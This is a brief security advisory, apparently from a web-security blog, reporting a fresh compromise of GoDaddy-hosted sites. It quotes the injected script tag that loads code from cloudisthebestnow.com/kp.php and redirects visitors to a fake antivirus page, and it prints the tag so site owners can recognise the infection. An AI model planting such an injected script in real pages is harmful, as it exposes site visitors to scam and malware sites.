If you thought your problems at GoDaddy were over, well, not yet.
We’ve confirmed that today at around 3pm EST, GoDaddy servers were hacked again. Malware pointing to cloudisthebestnow.com/kp.php was inserted on thousands of sites hosted by the provider.
This is how the script will look like in your pages:
< script src = http://cloudisthebestnow.com/kp.php >
It will redirect your users to that nasty “fake AV” page again. What’s interesting is that cloudisthebestnow.com is hosted and owned by the same people involved in the latest attacks at GoDaddy.